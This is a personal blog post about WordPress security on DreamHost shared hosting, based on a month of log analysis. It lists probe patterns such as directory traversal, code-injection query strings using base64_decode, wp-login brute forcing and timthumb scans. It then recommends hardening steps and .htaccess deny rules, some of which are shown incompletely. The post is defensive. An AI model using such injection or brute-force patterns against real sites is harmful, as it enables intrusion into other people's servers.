I’ve been analyzing my access and error logs for over a month now and I can make a few comments about good wordpress practices. From my 6 dreamhost wordpress installs on 3 different dreamhost machines I have seen a litany of bad behavor in general and bad wordpress behavior in specific. Before I go ANY further I want to make clear that DREAMHOST is awesome for allowing access to access logs and error logs and what I’m about to write must be happening on EVERY shared host in the business.
I started writing a site specific perl program with a mysql database to process daily and hourly access logs and error logs. My goal was to play whack-a-mole and use .htaccess to shut off bad people from accessing my 5 wordpress blogs. Since I started on January 19th, I’ve banned 350 ip addresses, and 8 subnets (where I have a collection of 5 or more trolls on a single subnet). So far, about 25% of banned address return to try (unsuccessfully) again to get more info.
many of the trolls are not specific to wordpress ,like trolls trying to access phpmyadmin, trying to access directories that were deleted 5 years ago, trolling for crossdomain.xml, looking for /cgi-bin/cvename, trying to go up the directory structure (/…/…/…/) imbedding HTTP in the php request, trying to encode php in the php request, trying to encode href, or weirdly trying to type +result:++ into the php request; a large number of trollers use the HTTP head command to see what’s happening on your files; how about /.google-analytics/ga.js as a request? In a month, I think I’ve seen a lot or requests unrelated to people actually using the website.
I have seen some VERY specific wordpress attacks:
Lots of attempts to poke at wp-login; this usually starts with a signup troll that starts wp-signup.php, then moves on to wp-login?register and pokes around some. Next I’ve seen repeated attempts to crack passwords on wp-login. Repeatedly I’ve seen 1373 attempts in 30 seconds to crack wp-login. Since I started, I’ve installed the login lockdown plugin to close this hole.
crud on the end of a wordpress php command, ESPECIALLY plugins that are unusual. If you use a plugin that isn’t popular expect to see if it will pass a command to google search (this appears to be the holy grail of wp-hackers, since it will then possibly execute a php command. Lots of php?=http:xxx.com requests to probe how the command is handled, also php?dhjdjd=href(hhhh) When you see php?=base64_decode it’s an attempt to inject code into your wordpress site and become part of your php program (and therefore have your priviledges as owner
WordPress structure probing - where is wp-login? have you renamed wp-admin? Let’s look at wp-content/xmlrpc.php and see what we can find out. How about wp-includes/wlwmanifest.xml what can it tell me about the file structure?
Probing for previous wordpress hacks, over the last 10 days I’ve seen over 10 attacks by someone probing for every theme that every supported timthumb. Within 20 seconds I get 150-200 requests for timthumb on every theme imaginable.
What you can do to protect yourself:
ON PANEL at dreamhost:
Under users edit the user that runs your website and enable ‘Enhanced security’. This will make the default file permissions on your website harder for people who aren’t YOU to see what you have. specifically you are protected from other admins on your shared website.
Optional: I would disallow FTP and force everyone to use SSH, also under the user edit in panel.
On wordpress as an administrator:
UPDATE WORDPRESS and keep it updated. Most bugs are fixed and updates are transmitted, please update your version of wordpress
Delete unused themes - people are probing unused themes for ways to crack your wordpress and take control away from you. If you have 30 unused themes, your exposed to 30 potential threat areas.
delete unused plugins - again lots of unused code lying around to be probed by people.
Create an admin account with your name and delete the account called ‘admin’. This is what trolls look for to password crack. Use a password on your admin accounts that wordpress doesn’t think is weak.
Install a plugin called ‘login lockdown’ which will protect you against people trying to break into your accounts.
Install a plugin called ‘file monitor plus’; this seems to be a pain-in-the-ass plugin when you first install it, but it will save your life if you use it. It records ALL changes to ALL files on your website. It reports once an hour. If you are hacked, you’ll get a report within an hour that specific files have been added, deleted, etc.
A few things to be aware of:
wp-config.php needs to exist in the main wordpress directory, but it contains your database information. It’s used by programs on word press but should NOT be accessed by users. One way to stop this is to edit .htaccess in your website account (/home/user/website/) and add this to the end:
deny from all
While your at it you might want to stop people from seeing htaccess:
prevents people from seeing ht access
deny from all
without going into excruciating detail, this htaccess command will disable people from seeing your directory structure:
disable directory browsing
Options All -Indexes
I’m wondering in a longer time frame whether dreamhost could put in some security checks like 1200+ requests to wp-login in less than 5 minutes might be excessive? or anyone trying to insert php code would be permanently banned from dreamhost?